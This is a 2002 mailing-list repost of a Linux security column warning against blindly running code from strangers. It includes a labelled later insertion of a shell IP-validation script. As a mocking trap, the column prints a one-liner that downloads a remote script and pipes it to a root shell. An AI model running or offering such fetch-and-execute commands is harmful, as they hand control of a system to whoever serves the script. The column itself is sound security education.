[ISN] Vet the code or pay the price

From: InfoSec News (isnat_private)
Date: Tue Oct 22 2002 - 23:02:01 PDT


    +------------------------------------------------------------------+
    |  Linux Security: Tips, Tricks, and Hackery                       |
    |  Published by Onsight, Inc.                                      |
    |                                                                  |
    |  22-October-2002                                                 |
    |  http://www.hackinglinuxexposed.com/articles/20021022.html       |
    +------------------------------------------------------------------+
    
    This issue sponsored by: Hacking Linux Exposed
    
    Learn how to think like an attacker in order to secure your Linux
    network.
    
    In the ever-changing world of global data communications, inexpensive
    Internet connections, and fast-paced software development, security
    is constantly being compromised. Linux has always been considered the
    digital playground for crackers. Many hacks, exploits, and network
    security tools are written on Linux because it's readily available.
    Hacking Linux Exposed: Linux Security Secrets & Solutions shows you,
    step-by-step, how to defend against the latest Linux attacks by
    understanding the hacker's methods and sinister thought processes.
    
    For more information, visit http://www.hackinglinuxexposed.com/
    
    --------------------------------------------------------------------
    
    Vet the code or pay the price
    By Brian Hatch
    
    Summary: Too many people blindly execute commands from anonymous
    strangers without checking to see what lies hidden, and leave
    themselves open to malicious attacks.
    
    The Internet and its myriad mailing lists can offer a wealth of help
    and assistance when you have problems. When asking what obscure
    OpenSSL command you need to convert your X509 certificate from .cer to
    .pem format you'll likely get an answer[1] from someone you've never
    met. When trying to fix your Apache configuration to block access to
    all .htaccess files, someone will provide a snippet[2] of
    configuration that can help you out.
    
    Unfortunately, many people blindly copy and paste the suggestions
    without analysing what they're given. In the best scenario, the
    commands will not work and may leave you thinking you'd fixed your
    problem. In the worst case, you may have been given a trojan that
    will break the security of your own system and hand it to the
    cracker. This sort of trick is common on security lists where someone
    posts 'exploit code' to test your software but actually binds a
    rootshell or deletes your files.
    
    Although most folks claim never to trust code from unknown sources, I
    can still tell that this happens every day. For example two weeks ago
    in this column I showed you how you could create a simple but
    effective firewall in 10 minutes[3]. The column included a shell
    script you could run with minimal changes. The top of the script read
    as follows:
    
      # Definitions
      EXT_INTERFACE=eth1
      EXT_IP=300.3.3.3
      INT_INTERFACE=eth0
      INT_IP=192.168.1.1
    
    The IP address I used was 300.3.3.3. Anyone who's played with IP much
    will see that this doesn't make sense. The bytes in a valid IP
    address range between 0 and 255. [4] By choosing 300, I guaranteed
    that this script would blow up if anyone tried to run it unaltered.
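    A defender-side check for the Definitions block, added here as an example and not code from the column: a POSIX sh validator for the IPv4 placeholders, so an unaltered 300.3.3.3 stops the script with an explicit message before any firewall rule is touched (the function names are my own).

```shell
#!/bin/sh
# Added example (not from the original column): validate the Definitions
# block of a firewall script before any rule is loaded, so a placeholder
# like 300.3.3.3 fails early and clearly instead of halfway through.

# is_ipv4 ADDR -> 0 when ADDR is four dotted decimal octets, each 0..255
is_ipv4() {
    addr=$1
    # Only digits and dots, no leading/trailing/doubled dots.
    case "$addr" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    oldifs=$IFS
    IFS=.
    set -- $addr
    IFS=$oldifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        # Exact decimal ranges; leading zeros (e.g. 010) are rejected.
        case "$octet" in
            0|[1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5]) ;;
            *) return 1 ;;
        esac
    done
    return 0
}

# check_definitions EXT_IP INT_IP -> 0 when both are valid, 1 otherwise,
# naming every bad value on stderr so the reader knows what to edit.
check_definitions() {
    status=0
    for pair in "EXT_IP=$1" "INT_IP=$2"; do
        name=${pair%%=*}
        value=${pair#*=}
        if ! is_ipv4 "$value"; then
            echo "error: $name=$value is not a valid IPv4 address" >&2
            status=1
        fi
    done
    return $status
}

# Definitions as in the column; 300.3.3.3 is the deliberate placeholder.
EXT_IP=300.3.3.3
INT_IP=192.168.1.1

if check_definitions "$EXT_IP" "$INT_IP"; then
    echo "definitions OK"
else
    echo "edit the Definitions block before running this script" >&2
fi
```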
    
    And run it they did. I received five emails from folks telling me
    that the code didn't work, and that they got errors because of the
    invalid IP address.[5] I get these types of complaints frequently.
    
    (The other kind of mail I get frequently contains little more than 'I
    need a program that will let me break into my friends computer. Send
    it to me now!'. I get this so much that I thought I'd help out by
    providing the following which must, sadly, be run as root:
    
     lynx --source http://www.hackinglinuxexposed.com/auto-hack-script.f?IP | sh
    
    You must replace 'IP' with the IP or hostname you'd like to attack.)
    
    Hopefully I don't need to explain any further why you shouldn't
    blindly run code from others. Next week I'll explain the methods I
    use when writing examples to help keep others from accidentally
    running my commands as-is.
    
    NOTES:
    
    [1] openssl x509 -in file.cer -inform d -out file.pem
    
    [2] You'd use:
       <Files ~ "^\.ht">
          Order allow,deny
          Deny from all
       </Files>
    
    [3] http://www.hackinglinuxexposed.com/articles/20021008.html
    
    [4] Of course the values 0 and 255 are not available in some cases.
    The first and last IP addresses in your range are reserved for the
    network address and the broadcast address, respectively. Some routers
    still do not let you use 0 or 255 as an octet, even when the netmask
    makes it clear it is not a network or broadcast address.
    
    [5] *Hobbit* went so far as to refer to this article as '10 minute
    error fodder' because of the illegal IP used throughout.
    
                                -------------                            
    Brian Hatch is Chief Hacker at Onsight, Inc and author of Hacking
    Linux Exposed and Building Linux VPNs. He doesn't trust code that
    anyone sends him, and certainly nothing he provides to himself. Brian
    can be reached at brianat_private
    
    --------------------------------------------------------------------
    This newsletter is distributed by Onsight, Inc.
    
    The list is managed with MailMan (http://www.list.org). You can
    subscribe, unsubscribe, or change your password by visiting
    http://lists.onsight.com/ or by sending email to
    linux_security-requestat_private
    
    Archives of this and previous newsletters are available at
    http://www.hackinglinuxexposed.com/articles/
    
    --------------------------------------------------------------------
    
    Copyright 2002, Brian Hatch.
    
    
    